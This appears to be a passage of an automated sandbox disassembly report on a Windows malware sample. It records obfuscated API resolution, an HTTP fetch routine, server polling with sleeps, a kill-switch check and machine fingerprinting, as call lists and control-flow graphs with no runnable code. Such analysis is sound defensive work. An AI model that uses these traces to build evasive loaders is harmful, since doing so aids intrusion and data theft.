                                  • GetProcAddress.KERNEL32(75550000,016E6380), ref: 00F79C2D
                                  • GetProcAddress.KERNEL32(75550000,016E6400), ref: 00F79C45
                                  • GetProcAddress.KERNEL32(75550000,016F8F10), ref: 00F79C5E
                                  • GetProcAddress.KERNEL32(75550000,016F8FB8), ref: 00F79C76
                                  • GetProcAddress.KERNEL32(75550000,016FC990), ref: 00F79C8E
                                  • GetProcAddress.KERNEL32(75550000,016FC9F0), ref: 00F79CA7
                                  • GetProcAddress.KERNEL32(75550000,016EB400), ref: 00F79CBF
                                  • GetProcAddress.KERNEL32(75550000,016FC9A8), ref: 00F79CD7
                                  • GetProcAddress.KERNEL32(75550000,016FC810), ref: 00F79CF0
                                  • GetProcAddress.KERNEL32(75550000,016FC9C0), ref: 00F79D08
                                  • GetProcAddress.KERNEL32(75550000,016FCA08), ref: 00F79D20
                                  • GetProcAddress.KERNEL32(75550000,016E6560), ref: 00F79D39
                                  • GetProcAddress.KERNEL32(75550000,016E6300), ref: 00F79D51
                                  • GetProcAddress.KERNEL32(75550000,016E65C0), ref: 00F79D69
                                  • GetProcAddress.KERNEL32(75550000,016E6420), ref: 00F79D82
                                  • GetProcAddress.KERNEL32(75550000,016FC918), ref: 00F79D9A
                                  • GetProcAddress.KERNEL32(75550000,016FCA68), ref: 00F79DB2
                                  • GetProcAddress.KERNEL32(75550000,016EB590), ref: 00F79DCB
                                  • GetProcAddress.KERNEL32(75550000,016E6440), ref: 00F79DE3
                                  • GetProcAddress.KERNEL32(75550000,016FC900), ref: 00F79DFB
                                  • GetProcAddress.KERNEL32(75550000,016FC840), ref: 00F79E14
                                  • GetProcAddress.KERNEL32(75550000,016FC8E8), ref: 00F79E2C
                                  • GetProcAddress.KERNEL32(75550000,016FCAC8), ref: 00F79E44
                                  • GetProcAddress.KERNEL32(75550000,016E62C0), ref: 00F79E5D
                                  • GetProcAddress.KERNEL32(75550000,016FCAF8), ref: 00F79E75
                                  • GetProcAddress.KERNEL32(75550000,016FC870), ref: 00F79E8D
                                  • GetProcAddress.KERNEL32(75550000,016FC930), ref: 00F79EA6
                                  • GetProcAddress.KERNEL32(75550000,016FCA20), ref: 00F79EBE
                                  • GetProcAddress.KERNEL32(75550000,016FCA38), ref: 00F79ED6
                                  • GetProcAddress.KERNEL32(75550000,016FCAE0), ref: 00F79EEF
                                  • GetProcAddress.KERNEL32(75550000,016FC960), ref: 00F79F07
                                  • GetProcAddress.KERNEL32(75550000,016FC858), ref: 00F79F1F
                                  • GetProcAddress.KERNEL32(75550000,016FCA50), ref: 00F79F38
                                  • GetProcAddress.KERNEL32(75550000,016F99C8), ref: 00F79F50
                                  • GetProcAddress.KERNEL32(75550000,016FC8A0), ref: 00F79F68
                                  • GetProcAddress.KERNEL32(75550000,016FC978), ref: 00F79F81
                                  • GetProcAddress.KERNEL32(75550000,016E62E0), ref: 00F79F99
                                  • GetProcAddress.KERNEL32(75550000,016FC8D0), ref: 00F79FB1
                                  • GetProcAddress.KERNEL32(75550000,016E6320), ref: 00F79FCA
                                  • GetProcAddress.KERNEL32(75550000,016FC948), ref: 00F79FE2
                                  • GetProcAddress.KERNEL32(75550000,016FC9D8), ref: 00F79FFA
                                  • GetProcAddress.KERNEL32(75550000,016E6340), ref: 00F7A013
                                  • GetProcAddress.KERNEL32(75550000,016E63C0), ref: 00F7A02B
                                  • LoadLibraryA.KERNEL32(016FCA80,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A03D
                                  • LoadLibraryA.KERNEL32(016FCA98,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A04E
                                  • LoadLibraryA.KERNEL32(016FCAB0,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A060
                                  • LoadLibraryA.KERNEL32(016FC828,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A072
                                  • LoadLibraryA.KERNEL32(016FC8B8,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A083
                                  • LoadLibraryA.KERNEL32(016FC888,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A095
                                  • LoadLibraryA.KERNEL32(016FCB70,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A0A7
                                  • LoadLibraryA.KERNEL32(016FCB58,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A0B8
                                  • GetProcAddress.KERNEL32(75750000,016E6960), ref: 00F7A0DA
                                  • GetProcAddress.KERNEL32(75750000,016FCC18), ref: 00F7A0F2
                                  • GetProcAddress.KERNEL32(75750000,016F88C0), ref: 00F7A10A
                                  • GetProcAddress.KERNEL32(75750000,016FCCA8), ref: 00F7A123
                                  • GetProcAddress.KERNEL32(75750000,016E6900), ref: 00F7A13B
                                  • GetProcAddress.KERNEL32(73CC0000,016EB1F8), ref: 00F7A160
                                  • GetProcAddress.KERNEL32(73CC0000,016E69E0), ref: 00F7A179
                                  • GetProcAddress.KERNEL32(73CC0000,016EB108), ref: 00F7A191
                                  • GetProcAddress.KERNEL32(73CC0000,016FCC48), ref: 00F7A1A9
                                  • GetProcAddress.KERNEL32(73CC0000,016FCD08), ref: 00F7A1C2
                                  • GetProcAddress.KERNEL32(73CC0000,016E6840), ref: 00F7A1DA
                                  • GetProcAddress.KERNEL32(73CC0000,016E6A00), ref: 00F7A1F2
                                  • GetProcAddress.KERNEL32(73CC0000,016FCC90), ref: 00F7A20B
                                  • GetProcAddress.KERNEL32(757E0000,016E6740), ref: 00F7A22C
                                  • GetProcAddress.KERNEL32(757E0000,016E68A0), ref: 00F7A244
                                  • GetProcAddress.KERNEL32(757E0000,016FCCC0), ref: 00F7A25D
                                  • GetProcAddress.KERNEL32(757E0000,016FCC30), ref: 00F7A275
                                  • GetProcAddress.KERNEL32(757E0000,016E68E0), ref: 00F7A28D
                                  • GetProcAddress.KERNEL32(758D0000,016EAFA0), ref: 00F7A2B3
                                  • GetProcAddress.KERNEL32(758D0000,016EB1D0), ref: 00F7A2CB
                                  • GetProcAddress.KERNEL32(758D0000,016FCCD8), ref: 00F7A2E3
                                  • GetProcAddress.KERNEL32(758D0000,016E6820), ref: 00F7A2FC
                                  • GetProcAddress.KERNEL32(758D0000,016E6920), ref: 00F7A314
                                  • GetProcAddress.KERNEL32(758D0000,016EB338), ref: 00F7A32C
                                  • GetProcAddress.KERNEL32(76BE0000,016FCBB8), ref: 00F7A352
                                  • GetProcAddress.KERNEL32(76BE0000,016E68C0), ref: 00F7A36A
                                  • GetProcAddress.KERNEL32(76BE0000,016F89C0), ref: 00F7A382
                                  • GetProcAddress.KERNEL32(76BE0000,016FCD20), ref: 00F7A39B
                                  • GetProcAddress.KERNEL32(76BE0000,016FCD38), ref: 00F7A3B3
                                  • GetProcAddress.KERNEL32(76BE0000,016E67A0), ref: 00F7A3CB
                                  • GetProcAddress.KERNEL32(76BE0000,016E67C0), ref: 00F7A3E4
                                  • GetProcAddress.KERNEL32(76BE0000,016FCBD0), ref: 00F7A3FC
                                  • GetProcAddress.KERNEL32(76BE0000,016FCB88), ref: 00F7A414
                                  • GetProcAddress.KERNEL32(75670000,016E6A20), ref: 00F7A436
                                  • GetProcAddress.KERNEL32(75670000,016FCDF8), ref: 00F7A44E
                                  • GetProcAddress.KERNEL32(75670000,016FCBE8), ref: 00F7A466
                                  • GetProcAddress.KERNEL32(75670000,016FCDB0), ref: 00F7A47F
                                  • GetProcAddress.KERNEL32(75670000,016FCD98), ref: 00F7A497
                                  • GetProcAddress.KERNEL32(759D0000,016E6860), ref: 00F7A4B8
                                  • GetProcAddress.KERNEL32(759D0000,016E69A0), ref: 00F7A4D1
                                  • GetProcAddress.KERNEL32(76D80000,016E6940), ref: 00F7A4F2
                                  • GetProcAddress.KERNEL32(76D80000,016FCCF0), ref: 00F7A50A
                                  • GetProcAddress.KERNEL32(6F5C0000,016E66E0), ref: 00F7A530
                                  • GetProcAddress.KERNEL32(6F5C0000,016E6980), ref: 00F7A548
                                  • GetProcAddress.KERNEL32(6F5C0000,016E6700), ref: 00F7A560
                                  • GetProcAddress.KERNEL32(6F5C0000,016FCB40), ref: 00F7A579
                                  • GetProcAddress.KERNEL32(6F5C0000,016E6680), ref: 00F7A591
                                  • GetProcAddress.KERNEL32(6F5C0000,016E69C0), ref: 00F7A5A9
                                  • GetProcAddress.KERNEL32(6F5C0000,016E66A0), ref: 00F7A5C2
                                  • GetProcAddress.KERNEL32(6F5C0000,016E66C0), ref: 00F7A5DA
                                  • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 00F7A5F1
                                  • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 00F7A607
                                  • GetProcAddress.KERNEL32(75480000,016FCC78), ref: 00F7A629
                                  • GetProcAddress.KERNEL32(75480000,016F88D0), ref: 00F7A641
                                  • GetProcAddress.KERNEL32(75480000,016FCD50), ref: 00F7A659
                                  • GetProcAddress.KERNEL32(75480000,016FCD68), ref: 00F7A672
                                  • GetProcAddress.KERNEL32(753B0000,016E6780), ref: 00F7A693
                                  • GetProcAddress.KERNEL32(73970000,016FCD80), ref: 00F7A6B4
                                  • GetProcAddress.KERNEL32(73970000,016E6720), ref: 00F7A6CD
                                  • GetProcAddress.KERNEL32(73970000,016FCC00), ref: 00F7A6E5
                                  • GetProcAddress.KERNEL32(73970000,016FCBA0), ref: 00F7A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 3114907ee94f95ae4f347628d3c5299a2d235cb7d3b9155c5519bdd098db0730
                                  • Instruction ID: a360dc137e586e77fcacaca1f29f557c91b75789c6ba74792ba8e2e37205fd1a
                                  • Opcode Fuzzy Hash: 3114907ee94f95ae4f347628d3c5299a2d235cb7d3b9155c5519bdd098db0730
                                  • Instruction Fuzzy Hash: C2620DB5500610AFC37DDFA8F5989663FF9FF8C601794853AA62AC324CD63AA4C1DB50
                                  Function 00F66280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 f66280-f6630b call f7a7a0 call f647b0 call f7a740 InternetOpenA StrCmpCA 1040 f66314-f66318 1033->1040 1041 f6630d 1033->1041 1042 f6631e-f66342 InternetConnectA 1040->1042 1043 f66509-f66525 call f7a7a0 call f7a800 * 2 1040->1043 1041->1040 1044 f664ff-f66503 InternetCloseHandle 1042->1044 1045 f66348-f6634c 1042->1045 1061 f66528-f6652d 1043->1061 1044->1043 1048 f6634e-f66358 1045->1048 1049 f6635a 1045->1049 1051 f66364-f66392 HttpOpenRequestA 1048->1051 1049->1051 1053 f664f5-f664f9 InternetCloseHandle 1051->1053 1054 f66398-f6639c 1051->1054 1053->1044 1056 f663c5-f66405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 f6639e-f663bf InternetSetOptionA 1054->1057 1059 f66407-f66427 call f7a740 call f7a800 * 2 1056->1059 1060 f6642c-f6644b call f78940 1056->1060 1057->1056 1059->1061 1067 f6644d-f66454 1060->1067 1068 f664c9-f664e9 call f7a740 call f7a800 * 2 1060->1068 1071 f66456-f66480 InternetReadFile 1067->1071 1072 f664c7-f664ef InternetCloseHandle 1067->1072 1068->1061 1076 f66482-f66489 1071->1076 1077 f6648b 1071->1077 1072->1053 1076->1077 1080 f6648d-f664c5 call f7a9b0 call f7a8a0 call f7a800 1076->1080 1077->1072 1080->1071
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F64839
                                    • Part of subcall function 00F647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F64849
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • InternetOpenA.WININET(00F80DFE,00000001,00000000,00000000,00000000), ref: 00F662E1
                                  • StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F66303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F66335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,016FDA18,00000000,00000000,00400100,00000000), ref: 00F66385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F663BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F663D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00F663FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F6646D
                                  • InternetCloseHandle.WININET(00000000), ref: 00F664EF
                                  • InternetCloseHandle.WININET(00000000), ref: 00F664F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00F66503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 98d191d0086e7816e960b6091f635fb7e53c9f4144f282428dac2dd05e125d58
                                  • Instruction ID: eeaf3f96ddc53bd5ee90096879ce2bb5655a02de14f0511cee9e17649ce7a4c9
                                  • Opcode Fuzzy Hash: 98d191d0086e7816e960b6091f635fb7e53c9f4144f282428dac2dd05e125d58
                                  • Instruction Fuzzy Hash: 51714F71A00218ABDB24DFA0DC49FEE7B78BF44700F508199F50AAB1C4DBB56A85DF52
                                  Function 00F75510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 f75510-f75577 call f75ad0 call f7a820 * 3 call f7a740 * 4 1106 f7557c-f75583 1090->1106 1107 f755d7-f7564c call f7a740 * 2 call f61590 call f752c0 call f7a8a0 call f7a800 call f7aad0 StrCmpCA 1106->1107 1108 f75585-f755b6 call f7a820 call f7a7a0 call f61590 call f751f0 1106->1108 1133 f75693-f756a9 call f7aad0 StrCmpCA 1107->1133 1137 f7564e-f7568e call f7a7a0 call f61590 call f751f0 call f7a8a0 call f7a800 1107->1137 1124 f755bb-f755d2 call f7a8a0 call f7a800 1108->1124 1124->1133 1140 f756af-f756b6 1133->1140 1141 f757dc-f75844 call f7a8a0 call f7a820 * 2 call f61670 call f7a800 * 4 call f76560 call f61550 1133->1141 1137->1133 1144 f756bc-f756c3 1140->1144 1145 f757da-f7585f call f7aad0 StrCmpCA 1140->1145 1270 f75ac3-f75ac6 1141->1270 1149 f756c5-f75719 call f7a820 call f7a7a0 call f61590 call f751f0 call f7a8a0 call f7a800 1144->1149 1150 f7571e-f75793 call f7a740 * 2 call f61590 call f752c0 call f7a8a0 call f7a800 call f7aad0 StrCmpCA 1144->1150 1164 f75865-f7586c 1145->1164 1165 f75991-f759f9 call f7a8a0 call f7a820 * 2 call f61670 call f7a800 * 4 call f76560 call f61550 1145->1165 1149->1145 1150->1145 1250 f75795-f757d5 call f7a7a0 call f61590 call f751f0 call f7a8a0 call f7a800 1150->1250 1172 f75872-f75879 1164->1172 1173 f7598f-f75a14 call f7aad0 StrCmpCA 1164->1173 1165->1270 1174 f758d3-f75948 call f7a740 * 2 call f61590 call f752c0 call f7a8a0 call f7a800 call f7aad0 StrCmpCA 1172->1174 1175 f7587b-f758ce call f7a820 call f7a7a0 call f61590 call f751f0 call f7a8a0 call f7a800 1172->1175 1203 f75a16-f75a21 Sleep 1173->1203 1204 f75a28-f75a91 call f7a8a0 call f7a820 * 2 call f61670 call f7a800 * 4 call f76560 call f61550 1173->1204 1174->1173 1275 f7594a-f7598a call f7a7a0 call f61590 call f751f0 call f7a8a0 call f7a800 1174->1275 1175->1173 1203->1106 1204->1270 1250->1145 1275->1173
                                  APIs
                                    • Part of subcall function 00F7A820: lstrlen.KERNEL32(00F64F05,?,?,00F64F05,00F80DDE), ref: 00F7A82B
                                    • Part of subcall function 00F7A820: lstrcpy.KERNEL32(00F80DDE,00000000), ref: 00F7A885
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F75644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F756A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F75857
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F75228
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F75318
                                    • Part of subcall function 00F752C0: lstrlen.KERNEL32(00000000), ref: 00F7532F
                                    • Part of subcall function 00F752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00F75364
                                    • Part of subcall function 00F752C0: lstrlen.KERNEL32(00000000), ref: 00F75383
                                    • Part of subcall function 00F752C0: lstrlen.KERNEL32(00000000), ref: 00F753AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F7578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F75940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F75A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00F75A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: b6574aa2d1d3a3464b626f531b324c793f306d8476f5490b02c78df5097d72f8
                                  • Instruction ID: 4fbdc89efda34ca65533ccedae51125fe962f06232ffcb64d815be9ed4935450
                                  • Opcode Fuzzy Hash: b6574aa2d1d3a3464b626f531b324c793f306d8476f5490b02c78df5097d72f8
                                  • Instruction Fuzzy Hash: 8AE145719101049ACB18FBB0EC52EED7738AF94700F90C52AB51A57095EF786E4AEB93
                                  Function 00F717A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1301 f717a0-f717cd call f7aad0 StrCmpCA 1304 f717d7-f717f1 call f7aad0 1301->1304 1305 f717cf-f717d1 ExitProcess 1301->1305 1309 f717f4-f717f8 1304->1309 1310 f719c2-f719cd call f7a800 1309->1310 1311 f717fe-f71811 1309->1311 1312 f71817-f7181a 1311->1312 1313 f7199e-f719bd 1311->1313 1315 f71835-f71844 call f7a820 1312->1315 1316 f71913-f71924 StrCmpCA 1312->1316 1317 f71932-f71943 StrCmpCA 1312->1317 1318 f718f1-f71902 StrCmpCA 1312->1318 1319 f71951-f71962 StrCmpCA 1312->1319 1320 f71970-f71981 StrCmpCA 1312->1320 1321 f7187f-f71890 StrCmpCA 1312->1321 1322 f7185d-f7186e StrCmpCA 1312->1322 1323 f71821-f71830 call f7a820 1312->1323 1324 f718cf-f718e0 StrCmpCA 1312->1324 1325 f7198f-f71999 call f7a820 1312->1325 1326 f718ad-f718be StrCmpCA 1312->1326 1327 f71849-f71858 call f7a820 1312->1327 1313->1309 1315->1313 1348 f71926-f71929 1316->1348 1349 f71930 1316->1349 1350 f71945-f71948 1317->1350 1351 f7194f 1317->1351 1346 f71904-f71907 1318->1346 1347 f7190e 1318->1347 1329 f71964-f71967 1319->1329 1330 f7196e 1319->1330 1332 f71983-f71986 1320->1332 1333 f7198d 1320->1333 1340 f71892-f7189c 1321->1340 1341 f7189e-f718a1 1321->1341 1338 f71870-f71873 1322->1338 1339 f7187a 1322->1339 1323->1313 1344 f718e2-f718e5 1324->1344 1345 f718ec 1324->1345 1325->1313 1342 f718c0-f718c3 1326->1342 1343 f718ca 1326->1343 1327->1313 1329->1330 1330->1313 1332->1333 1333->1313 1338->1339 1339->1313 1355 f718a8 1340->1355 1341->1355 1342->1343 1343->1313 1344->1345 1345->1313 1346->1347 1347->1313 1348->1349 1349->1313 1350->1351 1351->1313 1355->1313
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00F717C5
                                  • ExitProcess.KERNEL32 ref: 00F717D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 353a2534991c73a15520cab88c5c7e98056272416fd0a5102ad6ca909093d94d
                                  • Instruction ID: 9371a09133c0b6891843a2cc7f849812efd46d1f0bb7fcc0fb1d89214a7c7338
                                  • Opcode Fuzzy Hash: 353a2534991c73a15520cab88c5c7e98056272416fd0a5102ad6ca909093d94d
                                  • Instruction Fuzzy Hash: E351B3B5A04209EFCB04DFA4D954BBE77B5BF44300F10C05AE51AA7244DB70D94AEB63
                                  Function 00F77500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 f77500-f7754a GetWindowsDirectoryA 1357 f77553-f775c7 GetVolumeInformationA call f78d00 * 3 1356->1357 1358 f7754c 1356->1358 1365 f775d8-f775df 1357->1365 1358->1357 1366 f775e1-f775fa call f78d00 1365->1366 1367 f775fc-f77617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 f77619-f77626 call f7a740 1367->1369 1370 f77628-f77658 wsprintfA call f7a740 1367->1370 1377 f7767e-f7768e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F77542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F7757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F7760A
                                  • wsprintfA.USER32 ref: 00F77640
